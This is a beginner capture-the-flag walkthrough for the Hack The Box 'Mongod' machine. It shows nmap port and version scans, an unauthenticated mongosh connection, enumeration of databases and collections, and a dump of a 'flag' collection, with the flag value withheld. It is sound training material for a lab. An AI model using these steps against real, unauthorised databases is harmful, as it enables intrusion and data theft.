The aim of this walkthrough is to provide help with the Mongod machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
You could use the unset command to remove it after you no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: How many TCP ports are open on the machine?
Use nmap to scan all the ports (tcp) on the target machine.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap -p- $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 20:50 BST
Nmap scan report for 10.129.228.30
Host is up (0.016s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
27017/tcp open mongod
Nmap done: 1 IP address (1 host up) scanned in 276.32 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
2
TASK 2
Question: Which service is running on port 27017 of the remote host?
Run nmap with the -sV options set.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap -sV -p 27017 $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 20:57 BST
Nmap scan report for 10.129.228.30
Host is up (0.019s latency).
PORT STATE SERVICE VERSION
27017/tcp open mongodb MongoDB 3.6.8
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.55 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
mongodb 3.6.8
TASK 3
Question: What type of database is MongoDB? (Choose: SQL or NoSQL)
Hello wikipedia… :)
nosql
TASK 4
Question: What is the command name for the Mongo shell that is installed with the mongodb-clients package?
Well, just like before, use the internet. To run it, use the mongosh command.
mongo
TASK 5
Question: What is the command used for listing all the databases present on the MongoDB server? (No need to include a trailing ;)
First let’s try and connect to the mongo database. Then use help to get a better idea of the available commands.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $mongosh --host $rhost --port 27017
Current Mongosh Log ID: 6454116baf46ee7fd101f1a3
Connecting to: mongodb://10.129.228.30:27017/?directConnection=true&appName=mongosh+1.8.0
Using MongoDB: 3.6.8
Using Mongosh: 1.8.0
For mongosh info see: https://docs.mongodb.com/mongodb-shell/
To help improve our products, anonymous usage data is collected and sent to MongoDB periodically (https://www.mongodb.com/legal/privacy-policy).
You can opt-out by running the disableTelemetry() command.
------
The server generated these startup warnings when booting
2023-05-04T19:47:17.293+0000:
2023-05-04T19:47:17.293+0000: ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2023-05-04T19:47:17.293+0000: ** See http://dochub.mongodb.org/core/prodnotes-filesystem
2023-05-04T19:47:20.674+0000:
2023-05-04T19:47:20.674+0000: ** WARNING: Access control is not enabled for the database.
2023-05-04T19:47:20.674+0000: ** Read and write access to data and configuration is unrestricted.
2023-05-04T19:47:20.674+0000:
------
test> help
Shell Help:
use Set current database
show 'show databases'/'show dbs': Print a list of all available databases.
'show collections'/'show tables': Print a list of all collections for current database.
'show profile': Prints system.profile information.
'show users': Print a list of all users for current database.
'show roles': Print a list of all roles for current database.
'show log <type>': log for current connection, if type is not set uses 'global'
'show logs': Print all logs.
exit Quit the MongoDB shell with exit/exit()/.exit
quit Quit the MongoDB shell with quit/quit()
Mongo Create a new connection and return the Mongo object. Usage: new Mongo(URI, options [optional])
connect Create a new connection and return the Database object. Usage: connect(URI, username [optional], password [optional])
it result of the last line evaluated; use to further iterate
version Shell version
load Loads and runs a JavaScript file into the current shell environment
enableTelemetry Enables collection of anonymous usage data to improve the mongosh CLI
disableTelemetry Disables collection of anonymous usage data to improve the mongosh CLI
passwordPrompt Prompts the user for a password
sleep Sleep for the specified number of milliseconds
print Prints the contents of an object to the output
printjson Alias for print()
convertShardKeyToHashed Returns the hashed value for the input using the same hashing function as a hashed index.
cls Clears the screen like console.clear()
isInteractive Returns whether the shell will enter or has entered interactive mode
For more information on usage: https://docs.mongodb.com/manual/reference/method
test>
As we can see in the line - ‘show databases’/‘show dbs’: Print a list of all available databases - either show databases or show dbs should do the trick here. Let’s try it.
test> show dbs
admin 32.00 KiB
config 72.00 KiB
local 72.00 KiB
sensitive_information 32.00 KiB
users 32.00 KiB
test>
show dbs
TASK 6
Question: What is the command used for listing out the collections in a database? (No need to include a trailing ;)
There is a line in the previous output that was provided by the help command, that could help us out here. Namely, the - ‘show collections’/‘show tables’: Print a list of all collections for current database - line.
To list all the collections on the target system, use the use command to switch between the databases. The flag collection in the sensitive_information database looks especially interesting.
test> use admin
switched to db admin
admin> show collections
system.version
admin> use config
switched to db config
config> show collections
system.sessions
config> use local
switched to db local
local> show collections
startup_log
local> use sensitive_information
switched to db sensitive_information
sensitive_information> show collections
flag
sensitive_information> use users
switched to db users
users> show collections
ecommerceWebapp
users>
show collections
TASK 7
Question: What is the command used for dumping the content of all the documents within the collection named flag in a format that is easy to read?
The internet is such a reliable helper… And we already know from the previous task that the flag collection is in the sensitive_information database. Switch to it, to dump it’s contents. Oo, great, we just solved the last task…
users> use sensitive_information
switched to db sensitive_information
sensitive_information> show collections
flag
sensitive_information> db.flag.find().pretty()
[
{
_id: ObjectId("630e3dbcb82540ebbd1748c5"),
flag: '<flag>'
}
]
sensitive_information>
db.flag.find().pretty()
SUBMIT FLAG
Question: Submit root flag
Already solved above. :)
flag
Make sure to terminate the target box before you continue with the next machine!